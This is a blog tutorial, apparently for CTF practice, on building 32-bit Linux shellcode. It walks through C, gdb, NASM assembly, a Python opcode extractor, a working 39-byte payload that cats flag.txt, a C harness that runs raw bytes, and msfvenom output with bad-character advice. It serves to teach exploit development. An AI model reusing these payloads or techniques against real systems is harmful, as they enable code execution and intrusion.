Crafting your own shellcode requires getting muddy with low level programming. One does not simply write machine code from memory. This blog post is my attempt at providing a template and tutorial of the shellcode creation process for a 32-bit Linux machine.
The first step we will take is to write the task we want our shellcode to perform in a high level language:
#include <unistd.h> int main(void) { char *egg[3]; egg[0] = "/bin/cat"; egg[1] = "flag.txt"; egg[2] = NULL; execve(egg[0],egg,NULL); }
Then statically compile the source and check to make sure it works as expected.
Note: There is already a file called flag.txt in the ‘ctf’ directory.
root@lab(~/ctf):# gcc -static -o getflag getflag.c root@lab(~/ctf):# ./getflag Flag{check_the_bytes}
Now we need to disassemble the execve(2) function and gather information about how it works at the assembly level.
root@lab(~/ctf):# gdb -q getflag gef➤ disas execve Dump of assembler code for function execve: 0x0806d8a0 <+0>: push ebx 0x0806d8a1 <+1>: mov edx,DWORD PTR [esp+0x10] 0x0806d8a5 <+5>: mov ecx,DWORD PTR [esp+0xc] 0x0806d8a9 <+9>: mov ebx,DWORD PTR [esp+0x8] 0x0806d8ad <+13>: mov eax,0xb 0x0806d8b2 <+18>: call DWORD PTR ds:0x80ec9f0 0x0806d8b8 <+24>: pop ebx 0x0806d8b9 <+25>: cmp eax,0xfffff001 0x0806d8be <+30>: jae 0x80715c0 <__syscall_error> 0x0806d8c4 <+36>: ret End of assembler dump.
From the disassembly dump we can identify the registers and their arrangement as well as the function call number (0xb). We know this is the function call number because of the x86 function call convention. The Intel Architecture Software Developer Manuals go over how the stack and various registers are supposed to be utilized prior to a call instruction. The function call numbers are documented in the following locations on most Linux systems:
/usr/src/linux/arch/x86/entry/syscalls/syscall_32.tbl /usr/src/linux/arch/x86/entry/syscalls/syscall_64.tbl
With all of this information we can postulate that the execve(2) system call resembles the following:
execve(%ebx, %ecx, %edx)
I’m using GDB with GEF, but bare-bones GDB will also work. We need to check the values of each register to confirm our assumptions.
gef➤ b *0x0806d8b2 Breakpoint 1 at 0x806d8b2 gef➤ r Breakpoint 1, 0x0806d8b2 in execve () gef➤ x/s $ebx 0x80bdd48: "/bin/cat" gef➤ x/wx $ecx 0xbffff614: 0x080bdd48 gef➤ x/2s 0x080bdd48 0x80bdd48: "/bin/cat" 0x80bdd51: "flag.txt" gef➤ p $edx $1 = 0x0 gef➤ x/17b 0x080bdd48 0x80bdd48: 0x2f 0x62 0x69 0x6e 0x2f 0x63 0x61 0x74 0x80bdd50: 0x00 0x66 0x6c 0x61 0x67 0x2e 0x74 0x78 0x80bdd58: 0x74
First we set a breakpoint after all the registers in question have been populated and then run the program so we can look at the values. Refer to the GDB documentation if you are not familiar with how to examine memory locations and registers. Next we need to craft our assembly code with the caveat that we have to avoid bad characters. More on that later.
section .txt global _start _start: xor eax, eax ; eax == 0 push eax ; NUL-terminate the "/bin/cat" string push 0x7461632f ; Push "/cat" string on the stack push 0x6e69622f ; Push "/bin" string on the stack mov ebx, esp ; ebx pointer to "/bin/cat" (NUL-terminated) push eax ; NUL-terminate the "flag.txt" string push 0x7478742e ; Push ".txt" string on the stack push 0x67616c66 ; Push "flag" string on the stack mov esi, esp ; esi pointer to "flag.txt" (NUL-terminated) push eax ; Place NULL on the stack push esi ; Place pointer to "flag.txt" push ebx ; Place pointer to "/bin/cat" mov ecx, esp ; ecx pointer to ["/bin/cat","flag.txt",NULL] xor edx, edx ; edx == NULL mov al, 0xb ; Store execve syscall number in al int 0x80 ; Do magik.
The code above is 32-bit assembly for Linux based systems. You can always tell from the software interrupt (int 0x80). Based on your experience level with assembly, the comments may or may not help understanding what is happening on each line, but I will try to elaborate briefly.
Executable programs are divided into sections .txt, .bss, .data, etc, that vary based on the specification for that format, which in our instance is the Executable and Linkable Format (ELF). On the Windows platform it is typically the Portable Executable (PE). The .txt section is where program code is stored. The .bss section contains uninitialized variables and the .data section is a read/write segment for initialized variables that do not have a local scope.
The Netwide Assembler (NASM) uses the directive global in order to export symbols for use during object code linking. The _start label identifies to the GNU Linker (/usr/bin/ld) where code execution begins. We could have used _main or wrench as labels, but then you would have to specify the label to the linker using the ‘-e’ switch.
root@lab(~/ctf):# ld -e wrench -o getflag getflag.o root@lab(~/ctf):# objdump -D getflag Disassembly of section .txt: 08048054 <wrench>: 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 2f 63 61 74 push $0x7461632f
The _start label is the default that ld(1) expects as the entry point for your code.
Moving down to the instructions it should be noted that NASM uses the Intel syntax as opposed to the AT&T syntax. The most notable difference between the two is the ordering of the source and destination operands. The format can be changed by passing the ‘-M’ switch to objdump or setting the ‘disassembly-flavor’ in gdb if you don’t like the default.
Strings are pushed onto the stack in reverse order (Little Endian) and have to be NULL-terminated. We also capture the memory location of the strings by using the position of the stack pointer (esp). The wonderful thing about this technique is we do not have to rely on a static memory location. From our C code we saw that execve used the ebx, ecx, and edx registers. We also used the esi register above to store a memory location on the stack. This creates a pointer to a pointer so to speak in esp which we copy into ecx. The Intel Developer Manuals outline which registers are safe to modify during the scope of a function call.Therefore, we cannot arbitrarily use any random register and expect consistent results.
Using xor to zero out a register instead of pushing a ‘0x0’ on the stack avoids one of the most common bad characters that hinders shellcode. Another technique utilized in the code above to avoid ‘0x0’ in our shellcode is to use the least significant bytes (8-bits) of EAX. The general purpose registers all have a way to reference their 16-bit version as well as the high and low order 8-bit versions. For the EAX register they are AX, AH, AL respectively. We use AL instead of EAX because it will be padded with zeros and that is not what we want.
8048077: b8 0b 00 00 00 mov eax,0xb
In order to assemble and link the code above use nasm and ld:
root@lab(~/ctf):# nasm -f elf getflag.asm root@lab(~/ctf):# ld -o getflag getflag.o root@lab(~/ctf):#./getflag
If all of this seems daunting, I would recommend reading “The Art of Assembly” by Randall Hyde or “Assembly Language Step-by-Step” by Jeff Duntemann. Having a copy of the “Intel Architecture Software Developer Manuals” on your bookshelf or PDF reader is also a tremendous help and they are free. I had the hardbacks shipped several years ago.
Moving on we now need to get the hex values for the opcodes in our program. We can use GDB or objdump:
root@lab(~/ctf):# objdump -D -M intel getflag getflag: file format elf32-i386 Disassembly of section .txt: 08048054 <_start>: 8048054: 31 c0 xor eax,eax 8048056: 50 push eax 8048057: 68 2f 63 61 74 push 0x7461632f 804805c: 68 2f 62 69 6e push 0x6e69622f 8048061: 89 e3 mov ebx,esp 8048063: 50 push eax 8048064: 68 2e 74 78 74 push 0x7478742e 8048069: 68 66 6c 61 67 push 0x67616c66 804806e: 89 e6 mov esi,esp 8048070: 50 push eax 8048071: 56 push esi 8048072: 53 push ebx 8048073: 89 e1 mov ecx,esp 8048075: 31 d2 xor edx,edx 8048077: b0 0b mov al,0xb 8048079: cd 80 int 0x80
If you look at the middle column the two digit hex numbers are what we need, they represent the contents in the last two columns. Normally, you would just copy each opcode by hand and prefix them with ‘\x’ so for example:
\x31\xc0\x50\x68\x2f\x63
We can automate this process in a number of ways, but lets do python:
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright (c) 2018 Michael Edie / @tankmek import re import sys opcode = re.compile(r"(^[0-9a-f]{2}$)") hexlist = [] def main(): for line in sys.stdin: for n in line.split(): match = opcode.findall(n) if match: hexlist.append(match[0]) print "Shellcode: %s bytes" % len(hexlist) print("%s" % format_opcodes(hexlist)) def format_opcodes(hexchars): shellcode = "" for x in hexchars: shellcode += "\\x" + x return shellcode if __name__ == '__main__': main()
The script above takes standard input from objdump and outputs the shellcode with the size in bytes.
root@lab(~/ctf):# objdump -D getflag | ./obj2shell.py Shellcode: 39 bytes \x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78\x74\x68\x66\x6c\x61\x67\x89\xe6\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
You can take the shellcode and test it with the following code:
#include <stdio.h> char egg[] = "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x68\x2e\x74\x78" "\x74\x68\x66\x6c\x61\x67\x89\xe6\x50\x56" "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; int main (int argc, char **argv) { int (*payload) (); payload= (int (*) ()) egg; (int) (*payload) (); }
Then compile and execute:
root@lab(~/ctf):# make test_shellcode cc test_shellcode.c -o test_shellcode root@lab(~/ctf):# ./test_shellcode Flag{check_the_bytes}
Voila! We are done. Just for fun here is a bash one-liner that does the same thing.
for i in $(objdump -D getflag | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ) ; do echo -n "\x$i"; done
Other options to speed up the process include modifying shellcode publicly available or using msfvenom to create what you need.
root@lab(~/ctf):# msfvenom -f c -p linux/x86/exec -a x86 --platform linux CMD='/bin/cat flag.txt' No encoder or badchars specified, outputting raw payload Payload size: 53 bytes Final size of c file: 248 bytes unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12\x00\x00\x00\x2f" "\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78" "\x74\x00\x57\x53\x89\xe1\xcd\x80";
But notice the default includes \x00 which will affect string buffers. This is what is known as a bad character (badchar). There are a few of them and you will have to do bad character analysis to figure out which ones you will need to avoid, otherwise your payload will have unintended consequences.
Thanks for reading.
Very nice bro.